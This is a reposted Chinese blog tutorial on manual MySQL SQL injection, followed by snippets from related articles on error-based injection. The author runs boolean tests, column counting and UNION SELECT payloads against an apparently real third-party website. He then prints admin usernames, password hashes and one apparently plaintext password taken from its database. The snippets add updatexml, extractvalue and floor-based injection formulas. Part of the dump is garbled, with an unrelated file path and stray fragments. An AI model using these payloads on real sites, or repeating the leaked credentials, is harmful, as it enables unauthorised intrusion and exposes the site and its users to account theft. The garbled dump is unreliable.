mysql报错型手工注入_mysql手工注入教程

最新推荐文章于 2023-03-19 12:01:26 发布
最新推荐文章于 2023-03-19 12:01:26 发布
阅读量194 收藏
点赞数
文章标签: mysql报错型手工注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_34502439/article/details/114858624
版权

大家早上好!,H。U。C-枫 又和大家见面啦//

本来早想做这个教程的,因为前段时间做过一套mssql的手工注入教程。今天给大家带来的是php+mysql

手工注入。临时找了个点,所以有些东西不能全给大家演示。以后有机会再给大家补充些教程。

这个就将就看吧。

目标站点:

http://www.doczj.com/doc/7b381bef48d7c1c708a145e0.html/myWeb/news_cont.php?nId=37

1 判断:and 1=1 and 1=2 判断不用说了吧。上次看到有人在论坛提问这个判断原理。

or 1=1 or 1=2 其实在网页原码里sql查询的原型是

select * from 表名 where $id='"7"' 注意单引号。字符型的才有''

我们提交 and 1=1 时就变成了

select * from 表名 whrer $id=xxx and 1=1 xxx 是id=后面的数据。

select * from 表名 whrer $id=xxx 结果为‘真’ 1=1 结果为‘真’ 全句结果是不是都为真呢。

and 1=2 当然为假了 and 两边有一个为假就是假,整句结果就为假,那么就是返回 错

select * from 表名 whrer $id=xxx or 1=1 同理整句也是为真的,但是,or和and不一样的地方是,当两边

都为真是 那么数据库是选择那个结果呢,不能确定,所以会返回随机一个页面。 and 要两边同理为真,没有选择

性 select * from 表名 whrer $id=xxx or 1=2 时,只是前面值为真,所以返回的是原来的页面。

我是这么理解的,大家怎么理解呢...、

好了,扯远了。

and 1=1 正确,and 1=11 错。

看清楚了,or 1=1 不是同一个页面。 or 1=11 是的原页面一样,说明有注入漏洞。。

2 爆字段数 order by x 5正确,6出错,说明是5个字段。

我就直接打字了,看我操作。

让他报错,其实手工注入只是灵活些,有时候加了注释和不加注释,和编码的

问题就可以解决工具不能跑的问题。

and 1=2 union select 1,2,3,4,5 mysql 注入,后面是可以不加表名就可以报的,当然加了存在的表名也是可以的。

and 1=2 union select 1,2,3,4,5 from admininfo 这个表是存在的,而且就是这个站的admin表。

更直接的方法就是,找后台。猜字段。passwd,username 一般一些站的列名都和这个表单的名字一样的。这

个站也不例外。直接爆下看吧,

3 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17

/**/ej`/**/192

d:\学工系统\web\WebSite\ClassMasterPage\ClassInfo.aspx:9

username内容:12

password内容:6fe97759aa27a0c9

username内容:admin

password内容:Dongshao520

username内容:test

password内容:cbadfa8bda1bcb8f

操作系统信息:

%20and%201=2%20union%20select%201,@@global.version_compile_os,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17

数据库权限:

and ord(mid(user(),1,1))=114 /* 返回正常说明为root

4 查用户版本裤名:user()数据库用户名,version()版本,database()数据库名

董青蒲
关注
MySQL手工报错注入
L_KevinK的博客
08-01 1164
MySQL手工报错注入(1)测试注入点是否可用(2)爆数据库相关信息(2)爆数据库表名 (1)测试注入点是否可用 1后加 ’ 号页面报错,爆出错误信息 (2)爆数据库相关信息 报错注入语句有多种,此贴仅讲适用于此网站的一种 and updatexml(1,concat(0x7e,(select user()),0x7e),1)-- #爆数据库用户 and updatexml(1,c...
mysql报错手工注入_Mysql报错手工注入
weixin_40000457的博客
01-19 245
????常用报错函数注入公式????No.1:floor'and(selectcount(*)frominformation_schema.tablesgroupbyconcat((selectversion()),floor(rand(0)*2)))#No.2:extractvalue'andextractvalue(1,concat(0x7e,(selectuser()),0x...
mysql报错手工注入_mysql手工注入
weixin_33526828的博客
02-28 244
1.判断是否存在注入点的方法和其他数据库类似,and 1=1 和and 1=2 2.判断数据库为oracle 提交注释字符/*,返回正常即是MySQL,否则继续提交注释符号--,该符号......实战access手工注入(通用的方法) “显示友好的HTTP错误信息”前面的钩,...Mysql 报错注入 SQL 注入获取数据库数据,利用的方法可以大致分为联合查询、报错、布尔盲注 以及延时注入, ...
mysql报错注入手工方法
weixin_38023368的博客
09-04 465
以前觉得报错注入有那么一长串,还有各种concat(),rand()之类的函数,不方便记忆和使用,一直没怎么仔细的学习过。这次专门学习了一下,看了一些大牛的总结,得到一些经验,特此记录下来,以备后续巩固复习。 总体来说,报错注入其实是一种公式化的注入方法,主要用于在页面中没有显示位,但是用echo mysql_error();输出了错误信息时使用。 公式具体如下 and(select 1 from(select count(*),concat((select (select (select concat.
mysql 手工报错注入_MYSQL手工注入(详细步骤)—(2)实战演练
weixin_35064596的博客
02-11 246
0x02 MYSQL 手工注入实战——基于错误的 SQL 注入前言,之前有对MYSQL基于报错手工注入进行过介绍,但今天的实验环境,并不是基于报错的SQL注入,而是一个基于布尔的SQL盲注测试流程。这个网站的SQL注入漏洞,大概1年前就有人发现过了,我也是在找环境的过程中,突然发现的。这个网站是存在WAF的(WTS-WAF)但是这个WAF并不是很管用,只是把空格与某些重要函数放到了黑名单里面:废...
mysql post手工注入_pikachu-数字注入(post)#手工注入
weixin_39842237的博客
02-07 718
1,因为是post,所以需要抓取数据包2,测试结果为数字注入提交恒等的语句可以查询到所有的数据信息3,使用UNION联合查询法判断字段数,测试为2个字段时没有报错,所以可以判断字段数为24,爆字段 #发现两个都可以查询5,查询数据库 #可以查到数据库名称为 pikachu6,查数据库pikachu下的表 #可以查到库pikachu下面有5个表(httpinfo,member,message,u...
mysql显错注入(渗透测试手工注入基本流程)
weixin_45698828的博客
10-20 1135
第一步:判断目标网站是否有sql注入漏洞。(盲注的核心)and 1=1 -> 页面有内容and 1=2 -> 页面没内容==> 网站是有sql注入漏洞了。第二步:判断网站的表的列数order by 1 --> 页面有内容,说明网站的表里面有1列。order by 2 --> 页面有内容,说明网站的表里面有2列。order by 3 --> 页面没有内容,说明网站的表里面没有3列。==> 只有2列。第三步:判断回显点(显错的核心)第四步:查询相关数据。
mysql union as 注入_Mysql 手工注入【常规 Union 查询篇】
weixin_42499681的博客
02-17 282
文章来源于:lsh4ck's Blog在开始真正的注入技巧之前,我们先来大致回顾下必要的 mysql 数据库基础下面是注入 Mysql 时经常会用到的一些单行函数,熟练使用是灵活注入的前提,尤其是在对抗一些 Waf 的时候字符串连接函数,将多个字符串连接成一个字符串,注意,中间只要字符串有一个为空,最后结果也为空 同样是连接多个字符串,但可以在开头指定分隔符,跟 concat()稍微不同,它会自动...
基于报错手工注入
qq_23066945的博客
10-27 511
基于报错手工注入 实验环境:sqlli 1.首先提示,请输入ID作为参数和数值 2.构建id参数后,返回正常 3.输入转义符 \ ,得到报错信息 “1”) LIMIT 0,1 (图片上引号内的为报错信息,所以这里去掉两个引号) 由此,我们可以得到大概的SQL语句为 select * from users where id=("1") limit 0,1 尝试闭合单引号,并注释之后的...
mysql手工注入之高级报错注入
asliheng的博客
11-29 717
mysql手工注入之高级报错注入 查看版本mysql版本 and+exists(selectfrom+(selectfrom(select+name_const(@@version,0))a+join+(select+name_const(@@version,0))b)c) 爆所有库 and(select 1 from(select count(*),concat((select (select ...
记一次注册功能处Mysql手工报错注入
qq_36270253的博客
04-01 4173
记一次注册功能处Mysql手工报错注入 知识点:报错注入是使用一些指定的函数来制造报错,从而从报错信息中获取设定的信息,比如select/insert/update/delete都可以使用报错来获取信息,报错注入的使用前提条件,是后台没有屏蔽数据库的报错信息,在语法发生错误的时候会显示在客户前端页面。 /////////分////////////割/////////\\\\\\线\\\\\\\\\\\ 安卓app除了反编译apk外,各功能点也有几率存在漏洞,甚至攻防演练的时候也可以从app资产寻找突破口。
mysql报错注入_Mysql报错注入总结
weixin_33842969的博客
12-23 322
Mysql注入虽然是老生常谈的问题,但是工作中更多的是使用sqlmap等工具进行注入测试的,原理方面还是不是很清楚,所以这段时间主要是自己搭建环境在学手工注入,简单的将自己的学习做一个总结和记录。在常见的注入报错注入是最简单的,也是最少的了,大多数都得采用盲注手法来测试,所以下文是对Mysql数据库报错注入的一个总结。首先认识MySQL UPDATE 查询:如果我们需要修改或更新 MyS...
mysql报错注入实战_手工注入——MySQL手工注入实战和分析
weixin_39746382的博客
01-18 127
今天进行了MySQL手工注入实战,分享一下自己的实战过程和总结,这里环境使用的是墨者学院的在线靶场。话不多说,咱们直接开始。第一步,判断注入点通过 ' 和构造 and 1=1 和 and 1=2 查看页面是否报错。这里通过and 1=1 发现页面正常。如下图。接下来,咱们再构造 and 1=2 发现页面报错,说明页面存在注入点。如下图。第二步,判断字段数通过 order by 语句,如果后面输入的...
浅谈基于报错手工注入
最新发布
dzqxwzoe的博客
03-19 374
没学过的同学也不要慌,可以去B站搜索相关视频,你搜关键词网络安全工程师会出现很多相关的视频教程,我粗略的看了一下,排名第一的视频就讲的很详细。从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。不过我们这个水平也就算个渗透测试工程师,也就只能做个基础的安全服务,而这个领域还有很多业务,像攻防演练、等保测评、风险评估等,我们的能力根本不够看。最后网站开发知识多少也要了解点,不过别紧张,只是学习基础知识。
SQL手工盲注、报错注入
5L2g556F5ZWl77yf
07-21 1427
报错注入,利用数据库某些机制,人为制造错误,使得注入结果都在错误信息中回显,一般在联合注入受限情况下使用;一般存在页面没有显示位,但是sql语句错误有错误输出的地方 sql盲注(SQL Injection Blind),和普通的注入原理一样,不同之处是注入后数据库和后台不回回显或回显有限的信息; 通常只能通过 “是”;“否”,反应速度的 “快”;“慢”,来判断。......
MySQL报错注入
秋水的博客
09-03 1513
注入简介 什么是报错注入? 顾名思义,报错注入就是通过页面爆出的错误信息,构造合适的语句来获取我们想要的数据,本章节讲述的注入,数据库为MySQL 报错注入成因 那么报错注入是怎么形成的呢? 首先是应用系统未关闭数据库报错函数,对于一些SQL语句的错误,直接回显在了页面上,部分甚至直接泄露数据库名和表名; 其次,必不可少就是后台未对MySQL相应的报错函数进行过滤 引入知识 ...
mysql报错手工注入_MYSQL手工注入(详细步骤)—— 待补充
weixin_35919125的博客
01-19 267
0x00 SQL注入的分类:(1)基于从服务器接收到的响应▲基于错误的 SQL 注入▲联合查询的类▲堆查询注射▲SQL 盲注•基于布尔 SQL 盲注•基于时间的 SQL 盲注•基于报错的 SQL 盲注(2)基于如何处理输入的 SQL 查询(数据类)•基于字符串•数字或整数为基础的(3)基于程度和顺序的注入(哪里发生了影响)★一阶注射★二阶注射(4)基于注入点的位置上的▲通过用户输入的表单域的注...
mysql报错注入_mysql报错注入手工方法
weixin_36236823的博客
12-23 151
以前觉得报错注入有那么一长串,还有各种concat(),rand()之类的函数,不方便记忆和使用,一直没怎么仔细的学习过。这次专门学习了一下,看了一些大牛的总结,得到一些经验,特此记录下来,以备后续巩固复习。总体来说,报错注入其实是一种公式化的注入方法,主要用于在页面中没有显示位,但是用echo mysql_error();输出了错误信息时使用。公式具体如下and(select 1 from(se...
SQL注入报错注入
selecthch的博客
06-09 5725
报错注入的前提:页面上没有显示位但是有sql语句执行错误信息输出。mysql_error()函数作用:返回上一个Mysql操作产生的文本错误信息如:      在用php对mysql进行一些增删改查操作的时候,如果数据库在执行的过程 中遇到错误,此时数据库是有错误回显的,但是这个错误回显不会显示在Web应 用页面中的。       如下是php脚本错误信息需要php.ini 中display_er...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值